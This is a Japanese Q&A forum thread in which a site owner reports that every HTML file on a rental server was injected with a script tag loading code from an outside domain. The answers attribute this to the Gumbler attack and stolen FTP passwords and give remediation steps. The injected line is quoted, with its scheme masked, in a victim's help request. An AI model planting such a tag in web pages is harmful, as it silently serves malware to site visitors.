- ベストアンサー
コンピュータウイルスについて
個人サイトを運営しているのですが、 先日そのサイトにアクセスしましたところ、Bloodhound.PDF.17 という名前のウイルスを検知しました。 なぜ自分のサイトにウイルスが入っているのかと思って色々調べてみますと、 どうやらサイトのすべてのhtmlファイルに怪しげなスクリプトが書き込まれていました。 サーバにアップしているhtmlファイルは膨大な量なのですが、 そのすべてに下記のスクリプトが書き込まれていました。 <script src=****://freevouchercodes.info/wp-admin/wp-rss2.php ></script> (****の部分はhttpです。怪しいのでこのURLにはアクセスしないでください) ファイルを転送する前の、ローカルフォルダに保存してあるhtmlにはそのようなスクリプトの記述はなく、 サーバ内のファイルにだけ記述されているという状況です。 そしてサイトにアクセスすれば何かファイルをDLさせるという仕組みのようです。 サーバはレンタルサーバを利用しており、転送ソフトはFFFTPというフリーソフトです。 レンタルサーバが原因なのか、転送ソフトが原因なのか、 あるいはこちらのパソコンにウィルスが感染していたせいなのかわかりません。 (一応スキャンしましたがパソコン内にウイルスは見つかりませんでした)。 サーバ内のhtmlファイルに勝手にスクリプトを書き込むというウイルスは存在するのでしょうか。 もしそうなら、原因はレンタルサーバか私のパソコンか、あるいは転送ソフトか、どこにあるのでしょうか。 詳しい方がいらっしゃれば対処法なども教えていただけませんか。 よろしくお願いします。
- skyraven
- お礼率67% (89/131)
- ネットワーク
- 回答数2
- ありがとう数7
- みんなの回答 (2)
- 専門家の回答
質問者が選んだベストアンサー
そのサイトは、Gumblerの攻撃を受けた可能性があり、 あなたのPCがGumblerに感染している可能性もあります。 Gumblerは、一旦沈静化していましたが、10末くらいから 亜種が発生し、ここ最近また感染が拡大しているそうです。 http://www.itmedia.co.jp/enterprise/articles/0910/23/news039.html Gumblerの攻撃の仕組みは、 http://internet.watch.impress.co.jp/cda/news/2009/05/26/23558.html にある、プロジェクタ投影資料がわかりやすいと思います。 ぜひ読んでください。 ここにある通り、一般ユーザが普通にWebサイトにアクセスするだけで、 PDFやFlashの脆弱性を利用してPCに感染します。 つい先日OSを再インストールしたとのことですが、 最新のWindowsUpdateと最新の各社パッチをちゃんと適用していますか? (特に、Adobe ReaderとAdobe Flashは最新パッチを当てていますか?) ウイルス対策ソフトも最新のデータにアップデートしていますか? もしこれらの対策を実施していないなら、あなたのPCがGumblerに感染し、 あなたのPCからFTPパスワードが漏れた可能性があります。 (今まで問題なかった一般的なWebサイトにしかアクセスしていなくても、 もしそのWebサイトが最近Gamblerに感染したとしたら、それにアクセスする だけで簡単にあなたのPCに感染します。) すぐに上記の対策を実施した(最新パッチ,最新ウイルス対策適用)後、 ・FTPパスワードを即刻変更し、 ・改ざんWebサイトのファイルを復旧してください。 (必ずこの順番で実施してください。でないと、再度FTPパスワードを 盗まる可能性があります。また、元のFTPパスワードは既に盗まれているため、 FTPパスワードを変更するまで再書き換えは発生します。) FTPパスワードがすぐに変更できないなら、即刻Webサイトのファイルを 削除してください。あなたのWebサイトが世界にウィルスをばらまいています。
その他の回答 (1)
- kadusaya
- ベストアンサー率53% (8/15)
もしかして、↓と同じ? http://oshiete1.goo.ne.jp/qa5461941.html 自分に原因が見つからなくて、パスワードもサーバー会社から指定されていて、同じレンタルサーバーだとしたら・・・、 確実にレンタルサーバーの会社が原因だよね。 不安感を掻き立てて申し訳ないけど、「HTMLの書き換え」 以外にも 「幼児ポルノの販売所」 にされている可能性もあるから気を付けてね。
お礼
ご紹介くださったページの質問を読んでみました。 私が使っているレンタルサーバもFTPのパスワードは指定のものです。 おそらく同じ会社ではないかと思います… ということはレンタルサーバ側に問題がある可能性が大きいようですね。 私はパソコンはつい先日OSを再インストールし直してきれいにしたばかりなので こちらがウイルスに感染している可能性は低いかと思います。 あとで一応、会社に問い合わせてみますね。 貴重な情報、ありがとうございました。
関連するQ&A
- コンピュータウイルスについて
コンピュータウイルスについての初歩的な質問です。 (1)コンピュータウイルスに一度感染してしまうとハードディスクを一旦フォーマットしないとウイルスの完全駆除はできないのでしょうか? (2)ウイルスに感染しているパソコンで作成したエクセルファイル・ワードファイルをUSBメモリーに保存してそれを他のパソコンに保存した場合、そのパソコンもウイルスに感染してしまうことになるのでしょうか? (3)ウイルス駆除ソフトを起動した際には、インターネット接続を一旦、切っておいた方が良いのでしょうか? (4)ウイルス感染ファイルをOSをインストールしていないディスク内に保存した場合、他の正常なファイルには影響はありますか? 初歩的な質問ですが、教えて頂けませんか?よろしくお願いします。
- 締切済み
- ウィルス・マルウェア
- これはどんなウィルスでしょう…?
これはどんなウィルスでしょう…? 脅威名:53833 ノートンにて検出されたウィルスです。 これってどんなウィルスなのでしょうか? 正体や説明のあるサイト等、御存知の方がいらっしゃいましたら、教えていただけると助かります! ここからは補足というか、余談です。 昨日、自分が運営しているサイトにアクセスしたところ、ノートンインターネットセキュリティの警告(安全なサイトではない)というが出ました。 色々調べたところ、自分のサイトがウィルスに感染しているわけではなく、同じレンタルサーバで同じサブドメインを使用している、私とは無関係の別サイトがウィルスに感染し、同じサブドメインを使っているサイト全てがノートン側で「安全ではないサイト」と判断されてしまった模様です。 現在警告解除(私のサイトの再審査など)を勧めてもらっているのですが、同じレンタルサーバ上にウィルスがあるのは確かなので万が一ということもありますし、検出されたウィルス"53833"がどんなウィルスなのか気になっているのです…。 Tracking cookieのような危険度の低いものならいいのですが…心配です。 どなたか御存知の方、または正体が説明されているサイトを御存知の方、いらっしゃいましたら回答宜しくお願い致します!
- ベストアンサー
- ウィルス・マルウェア
- コンピュータウイルスに詳しい方に質問です!
我が家のパソコンがネットに接続できなくなってしまいました。(´・ω・`) 普通に使ってたのですが、突如、「サーバーがみつかりません」の画面になり、以後サーバーに接続できない状態になっています(メール&ネット)。 これは可能性としてはウイルスの可能性が高いでしょうか?(サーバーにアクセスできなくなるウイルスなんてあるのでしょうか?) それともプロバイダーの問題の可能性が高いでしょうか?? 「自信あり」でご回答いただける方、教えてください!
- ベストアンサー
- ウィルス・マルウェア
- コンピュータウィルスなのでしょうか?
先日、友人の名前で添付ファイル付のメールが届きました。送信者は友達の名前です。件名は、文字化けしてて読めませんでした。添付ファイルは二つ付いてました。知り合いの名前だったので、疑いもせず添付ファイルを開きました。一つは、ワードパッドで開き、中には何も書かれていませんでした。もう一つは、私のパソコンにファイルを開くためのソフトが無かったのか、アプリケーションの選択画面が表示され、開くことができませんでした。 もしかして、これはウィルスなのでしょうか?パソコン自体は、問題なく稼動しており、ウィルススキャンをかけましたが、何も検出されませんでした。 このまま、パソコンを今までどおり使いつづけて良いのでしょうか??? 友達に尋ねたところメールを送った覚えは無いとの事でした。 よろしくお願いいたします。
- ベストアンサー
- その他(メールサービス・ソフト)
- ウイルス検出
ノートンが起動してウイルス警告が出ました。(今も出ています。) オブジェクト名 C:\Documents...\readres[1].html ウイルス名 Bloodhound.Exploit.6 適用した処理 ファイルを修復できません。 これはどうすればいいのでしょうか? ウイルス名のところをクリックするとサイトが出るんですが、英語なのでどうすればいいのか分かりません。 この問題のhtmlファイルを消せばいいだけでしょうか?
- ベストアンサー
- ウィルス・マルウェア
- ウィルス対策・・・
私の会社ではパソコンやネットワークの知識がある人が いません。 サーバーがレンタルサーバーなのかも分かっている人が いません。 すべてシステム会社に依存してしまっています。 ウィルス対策もよく分からない状態です。 そもそも、ウィルス対策とは、サーバー(メールサーバー?)側で やるものと、各PCにソフトをインストールする方法とあると聞き ました。 うちの会社では、サーバー側には何もしていないような気がします。 法人でウィルス対策を行う場合は、サーバー側とパソコン側の両方で ウィルス対策を行わなければ万全ではないのではないでしょうか? 個人でマカフィーをインストールするように、法人PCもPC側だけ でウィルス対策は大丈夫なのでしょうか? 普通の会社のセキュリティはどうしているのでしょうか?
- ベストアンサー
- その他(ITシステム運用・管理)
- サイトがウイルスに感染しました。
パソコン初心者です。 レンタルサーバーのサイトもウイルスJS_BLACOLE.SMTT に感染しました。 サイトのウイルス駆除方法教えてください。 宜しくお願いします。
- 締切済み
- スパイウェア
- ウィルス??
今日、2ちゃんを見ていたら、ウィルス警告がでました。 ウィルスの種類は、Bloodhound.exploit.6です。 「修復できませんでした」「アクセスが拒否されました」と出ました。 発生源は、C:\Documents and Settings\PC USER\ Local Settings \Temporary Internet Files \Content.IE5\09K30J83\l100[1].htm gooでいろいろ調べてみて、下記のことはやりました。 (1)インターネット一時ファイルのファイルの削除とcookieの削除。 (2)Norton AntiVirus2005を使っていますので、Live Updateしてシステムの完全スキャンをしました。 (3)オンラインでも、スキャンしてみました。 →ウイルスは検出されませんでした。 これだけで大丈夫なのでしょうか? まだ何かすることがあれば教えてください。 よろしくお願いします。 (パソコンosは、XPです。SP2も入っています。)
- ベストアンサー
- ウィルス・マルウェア
- コンピュータウイルスの感染源
どうしてURLをクリックしただけで、 メールを開いただけで サイトを閲覧してるだけで ウイルスにかかるのでしょうか。 以前まで想像していたのでは 知らないところからメールが届く →添付ファイルをパソコンに取り入れる →そのファイルを開く →感染 みたいな感じだと思っていたので 上述のような動作で感染するのはなんとも不思議でたまりません。 ウイルスは「そういうもの」なんでしょうか よろしくお願いします。
- ベストアンサー
- ネットワーク
- コンピューターウィルスについて
今年の3月にパソコンがトロイの木馬にやられてHDをリカバリーしました。それまではウィルスソフトは全く使っていませんでした。それからパソコンから時々キュッという音がするようになりました。常時ではないです。音がでるとサイドバーが黒くなりますが元に戻ります。逆にパソコンの文字が青く崩れた感じで表示しても、音がでると元にもどる(黒いまともな文字)ときもあります。XPの高速化として 1 パフォーマンスを優先させる(クラッシック画面にする) 2 壁紙とスクリーンセーバーをなしにする 3 システムサウンドをオフにする 4 windowsXP起動時のロゴ画面を非表示にする を設定しましたが4以外は音がすると設定前の状態に戻ります。友人に 聞いたら圧縮ファイルの中のウィルスが原因だろうと言われました。そこで聞きたいのですがHDをリカバリーしても取り除けないウィルスもあるんでしょうか。今はAVG8.0とファイナルProfessionaiレジストリクリーナーとGlary Utirities PROでウィルスをチェックしてますが検出されません。パソコンのスペックは NEC CPU Pentium4 1.6GHz メモリー 256MB HDD 80GB IE7 OS windoesXPプロフェッショナル2002SP2です。 パソコンに詳しい方よろしくお願いします。
- 締切済み
- ウィルス・マルウェア
お礼
サーバにアップロードしてあるhtmlファイルの更新日時を調べてみると OSを再インストールした次の日に書き換えられていました。 こちらのパソコンがウイルスに感染してたならいったいいつのまに?ですね… とりあえず一旦サイトのファイルはすべて削除し、 Lchan0211さんがおっしゃる通りFTPのパスワードは変更するようにします。 WindowsやAdobeは既に最新版にしていましたので大丈夫かと思います。 個人サイトのファイルまで書き換えるウイルスなんていたんですね… 国の重要機関とかそういうサイトだけのことかと思っていましたが。 役に立つ情報とアドバイス、ありがとうございました!